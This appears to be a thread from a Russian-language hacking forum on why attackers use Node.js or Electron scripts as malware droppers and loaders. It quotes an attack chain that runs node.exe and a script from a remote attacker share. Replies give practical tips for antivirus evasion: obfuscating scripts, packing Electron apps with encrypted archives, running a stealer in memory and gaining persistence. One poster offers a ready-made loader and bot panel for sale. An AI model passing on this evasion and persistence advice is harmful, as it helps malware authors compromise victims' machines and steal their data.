• XSS.stack #1 – первый литературный журнал от юзеров форума

В чем преимущество дроппера/лоадера на JS?

Отслеживать

BigBug

RAID-массив
Пользователь
Регистрация
01.03.2024
Сообщения
72
Реакции
61
На днях, на хабре появилась статья, с разбором атаки на компанию. Примечательно, что в качестве лоадера/дроппера был применен js-скрипт выполняемый в nodejs.

Общая схема такая:
- Жертве отправляется фишинговое письмо с LNK-файлом мимикрирующим под excel-файл
- После запуска .lnk, подключается сетевой диск командой net use hxxp://[IP_ADDRESS]
- С диска открывается фейковый excel
- Пока жертва отвлечена на excel, выполняется скрипт через nodejs командой \\[IP_ADDRESS]\node.exe \\[IP_ADDRESS]\js_script.txt
- Дальше, как я понял, скрипт собирает инфу о системе, подгружает и запускает payload

Стало интересно, почему в атаке используется JS, в чем преимущество такого подхода? С моего дилетантского ракурса, кажется, что тянуть 80мб nodejs не лучшая идея, когда можно сделать тоже самое небольшим лоадером на C/C++
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Ну потому что nodejs это рантайм, и интепритируемый язык, вот скажи на что они будут вешать детекты, на ноду саму или на контент скрипта который ты можешь обфусцировать как только угодно? Темболее v8 движок очень трудно даже разобрать, мне кажется легче плюсы реверсить чем ноду скомпиленый в bytecode и в лучшем случаее тянется не 80 мб, а 30
 
Пожалуйста, обратите внимание, что пользователь заблокирован
_lain сказал(а):
Ну потому что nodejs это рантайм, и интепритируемый язык, вот скажи на что они будут вешать детекты, на ноду саму или на контент скрипта который ты можешь обфусцировать как только угодно? Темболее v8 движок очень трудно даже разобрать, мне кажется легче плюсы реверсить чем ноду скомпиленый в bytecode и в лучшем случаее тянется не 80 мб, а 30
Еще плюсом добавлю что нода является легитимной платформой, как бы не хоти но запретить ноду очень трудно.
 
BigBug сказал(а):
На днях, на хабре появилась статья, с разбором атаки на компанию. Примечательно, что в качестве лоадера/дроппера был применен js-скрипт выполняемый в nodejs.

Общая схема такая:
- Жертве отправляется фишинговое письмо с LNK-файлом мимикрирующим под excel-файл
- После запуска .lnk, подключается сетевой диск командой net use hxxp://[IP_ADDRESS]
- С диска открывается фейковый excel
- Пока жертва отвлечена на excel, выполняется скрипт через nodejs командой \\[IP_ADDRESS]\node.exe \\[IP_ADDRESS]\js_script.txt
- Дальше, как я понял, скрипт собирает инфу о системе, подгружает и запускает payload

Стало интересно, почему в атаке используется JS, в чем преимущество такого подхода? С моего дилетантского ракурса, кажется, что тянуть 80мб nodejs не лучшая идея, когда можно сделать тоже самое небольшим лоадером на C/C++
Ссылка есть на статью?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Пожалуйста, обратите внимание, что пользователь заблокирован
Тот факт, что хацкеры пытаются в обходы антивирусов через использование сто-мегабайтных рантаймов говорит лишь о том, что ИБ индустрия как со стороны атакующих, так и со стороны нападающих явно идет не в ту сторону.
 
_lain сказал(а):
Ну потому что nodejs это рантайм, и интепритируемый язык, вот скажи на что они будут вешать детекты, на ноду саму или на контент скрипта который ты можешь обфусцировать как только угодно? Темболее v8 движок очень трудно даже разобрать, мне кажется легче плюсы реверсить чем ноду скомпиленый в bytecode и в лучшем случаее тянется не 80 мб, а 30
Теперь логика понятна, спасибо. Но получается такой дроппер будет жить до первой перезагрузки или есть способы его закрепить?
 
Да потому чистить не надо и пресловутый электрон апп билдер тебе 0вой рантайм сделает с фришным обфускатор.ио и запаканным апп.асар в крипте. Но есть и минусы в виде сложности написания кода онли дроперы и ратки, можно грузить кастом Стил на жс и запускать в памяти в целом много плюсов.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
BigBug сказал(а):
Теперь логика понятна, спасибо. Но получается такой дроппер будет жить до первой перезагрузки или есть способы его закрепить?
Да можно закрепится. Нода написана на плюсах, она умеет работать с вин апи, а если тебе чего то не хватает, ты можешь написать модуль для ноды на плюсах или на расте.
 
Имеется готовое решение для электрон-приложений: лоадер с панель и фукнционалом цмд-бота. Но у дроппера слишком много детектов. Если есть заинтересованные - велком в личку.
Не знаю как в ноде. В электроне закреп простой, смотрите в сторону фаилов самого приложения.
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх